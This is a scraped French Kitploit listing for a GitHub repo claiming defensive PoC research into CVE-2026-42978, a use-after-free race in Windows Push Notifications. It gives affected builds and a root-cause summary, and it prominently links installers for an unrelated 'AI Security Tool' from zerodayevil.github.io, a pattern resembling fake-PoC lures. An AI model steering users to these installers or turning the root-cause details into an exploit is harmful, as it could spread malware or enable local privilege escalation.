Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-42978-PoC-Research — Recherche PoC sur une condition de course et un use-after-free dans Windows Push Notifications (WpnService) CVE-2026-42978, scanner de diagnostic et module d'audit de sécurité pour AI Security Tool. | Kitploit
Outils/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
Outils DéfensifsEscalade de PrivilègesScanners de VulnérabilitésAnalyse des VulnérabilitésExploitationRenseignement sur les MenacesArticles et RechercheApprentissage et Éducation
GitHubsyntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

Recherche PoC sur une condition de course et un use-after-free dans Windows Push Notifications (WpnService) CVE-2026-42978, scanner de diagnostic et module d'audit de sécurité pour AI Security Tool.

Voir le dépôtSite web
9423il y a 20 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-42978
Module Windows Push Notifications pour l'outil de sécurité IA

Écosystème de sécurité IA de nouvelle génération, terminal multi-protocole et suite d'agents autonomes


Latest Release Build Status Donations Telegram Channel License

Site web · Documentation produit · Application hôte · Chat communautaire

Navigation du site : Accueil · Mises à jour · Téléchargements · Modules

Module banner


Application hôte officielle

Produit : AI Security Tool
Site : zerodayevil.github.io
Docs : https://zerodayevil.github.io/ai-security-tool

Ce module est une analyse relue et un profil de vérification sécurisé pour AI Security Tool.
N'utilisez que les modules listés sur le site du projet ou dans le catalogue officiel. Chargez ce module à l'intérieur de l'application approuvée, contre des points de terminaison que vous possédez ou pour lesquels vous disposez d'une autorisation écrite d'évaluation.

Ce dépôt ne fournit pas d'exploit weaponisé contre WpnService. Le laboratoire sous lab/ est une maquette autonome de la classe de bug (TOCTOU / double-fetch). Il ne communique pas avec le véritable service de notifications push.


Démarrage rapide et installation

Installez d'abord l'application hôte. Activez ensuite ce module depuis Modules → Windows / Local EoP → CVE-2026-42978.

Builds prêts à l'emploi

OS / plateformeVersionArchitecture / formatMis à jourStatutTéléchargement
Windowsv6.3.20installateur x64 (.exe)2026-09-08DernièreTélécharger .exe
Windowsv6.3.20portable x64 (.tar.gz)2026-09-08DernièreTélécharger .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05StableTélécharger .dmg
Linuxv5.3.27Universel x64 (.tar.gz)2026-09-01StableTélécharger .tar.gz
Androidv5.3.27APK ARM64 (.apk)2026-09-01StableTélécharger .apk

Sources officielles uniquement :

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

Aperçu conceptuel

CVE-2026-42978 est une élévation de privilèges locale dans Windows Push Notifications. Microsoft décrit un accès concurrent à une ressource partagée sans synchronisation adéquate (CWE-362). La recherche sur wpncore.dll corrigé vs. non corrigé montre une race use-after-free dans PresentationEndpointFacade lors de l'arrêt de la plateforme.

WpnService s'exécute dans la session 0 en tant que NT AUTHORITY\SYSTEM (svchost.exe -k netsvcs -p). La livraison des toasts, tuiles et badges passe par lui. Une race gagnée contre ce processus est un problème SYSTEM sur la machine locale — pas un bug DC distant en pré-authentification.

Statut : corrigé le 10 juin 2026 (Patch Tuesday). Cette page relève de la recherche défensive.

Ce n'est pas CVE-2026-41089 (RCE Netlogon). Composant différent, modèle de privilèges différent, date de correctif différente.


Spécifications

ChampValeur
CVECVE-2026-42978
BDUBDU:2026-08249
Avis fournisseurMSRC — Windows Push Notifications EoP
SévéritéÉlevée · CVSS 3.1 7.8
FaiblesseCondition de course CWE-362 · use-after-free sur le chemin d'arrêt
ComposantWindows Push Notifications · WpnService · wpncore.dll
Vecteur d'attaqueLocal
Privilèges requisFaibles (utilisateur local autorisé)
Interaction utilisateurAucune
Patch Tuesday10 juin 2026
Type de moduleAnalyse de recherche + vérification sécurisée intégrée + pack de détection

Périmètre

SKU client et serveur qui embarquent Push Notifications. Confirmez le KB exact sur MSRC avant de clôturer un ticket.

FamilleNotes
Windows 101809, 21H2, 22H2 (x86 / x64 / ARM64 selon le cas)
Windows 1123H2, 24H2, 25H2, 26H1
Windows Server2016 / 2019 / 2022 / 2025 (full et Server Core là où le composant existe)

Builds indicatifs d'après les notes de maintenance publiques (revérifiez toujours MSRC) :

BrancheBuild corrigé indicatif
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
Exemple wpncore.dll (24H2)vulnérable 26100.8521 → corrigé 26100.8655

Cause racine (recherche)

La façade encapsule les appels à l'API de notification et délègue à PresentationEndpointImpl. Lors de l'arrêt de la plateforme, l'objet NotificationPlatform est détruit. Plusieurs méthodes de la façade prenaient historiquement un pointeur de plateforme sans indicateur d'arrêt ni verrou partagé. Si le démontage gagne la course, l'appel suivant utilise un pointeur pendant.

Facade, platform, shutdown guard

Le même schéma verrou-et-garde a été appliqué sur 49 méthodes PresentationEndpointFacade::*. Les méthodes d'implémentation sous-jacentes ont été laissées telles quelles — la faille se situait au niveau de la façade.

Forme non corrigée (wpncore.dll 26100.8521)

Télécharger l’outil